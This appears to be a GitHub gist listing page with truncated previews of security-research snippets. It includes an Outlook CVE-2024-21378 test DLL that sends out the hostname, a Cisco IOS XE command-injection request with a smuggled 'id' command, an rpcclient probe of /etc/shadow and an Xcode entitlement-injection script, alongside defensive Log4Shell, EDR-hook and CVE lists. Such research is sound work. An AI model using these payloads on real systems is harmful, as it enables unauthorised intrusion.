Skip to content

Instantly share code, notes, and snippets.

View Hamid-K's full-sized avatar

Hamid Hamid-K

74 followers · 19 following
View GitHub Profile
@Homer28
Homer28 / test_dll.c
Last active July 13, 2024 01:59
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@rashimo
rashimo / gist:a0ef01bc02e5e9fdf46bc4f3b5193cbf
Last active November 14, 2023 12:54
Chain of Cisco IOS XE CVE-2023-20198 commands
## a POST request as:
POST /webui/rest/softwareMgmt/installAdd HTTP/1.1
{"filePath": "abc/aaa", "fileSystem": "", "ipaddress": "1:1:1:;id>/bootflash/PaJbOLOT;#", "mode": "tftp", "operation_type": "SMU"}
## then another command with the POC technique:
dir bootflash: | include PaJbOLOT
@singe
singe / hashcat_maskgen.sh
Created April 17, 2023 11:16
Generate a list of hashcat masks from a wordlist
#!/bin/bash
# hashcat mask generator
# by @singe
infile="$1"
outfile="$1.freq.masks"
outfile2="$1.length.masks"
tmp=$(mktemp)
@NyaMisty
NyaMisty / outline_graph.py
Created September 1, 2022 01:02
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active September 9, 2024 14:28
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@timb-machine
timb-machine / Yo Samba, what files do you have?
Last active September 19, 2022 18:25
Yo Samba, what files do you have?
$ echo netfilegetsec 'IPC$' /etc/shadow | rpcclient -U '%' 10.10.10.3
revision: 1
type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE
DACL
ACL Num ACEs: 3 revision: 2
---
ACE
type: ACCESS ALLOWED (0) flags: 0x00
Specific bits: 0x1ff
Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@tdec
tdec / gist:128751d818e9753364a72086b961390b
Last active June 23, 2023 20:41
Bluetooth vulnerabilities
Vulnerabilities published by Bluetooth SIG, Android, Apple, Intel and Qualcomm security bulletins, published at security conferences or as master thesis. If any are missing, thanks for pointing me to them !
Todo: macOS
Year | Name | CVE
2020 | Blurtooth: Exploiting Cross-Transport Key Derivation | 2020-15802
2020 | Pairing Method Confusion | 2020-10134
2020 | BIAS: Bluetooth Impersonation Attacks | 2020-10135
2020 | BlueRepli | ?
2020 | BLESA: Bluetooth Low energy spoofing attacks | 2020-9770
@Voorivex
Voorivex / HezarSploit.py
Created July 2, 2020 14:45
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ssl
import socket
import os
import sys
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from threading import Thread
@ChiChou
ChiChou / phase.py
Created April 30, 2020 18:07
import os
# preinstalled python is python2
filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'
evil = '''
<!---><!-->
<key>platform-application</key>
<true/>
<key>com.apple.private.security.no-container</key>
<true/>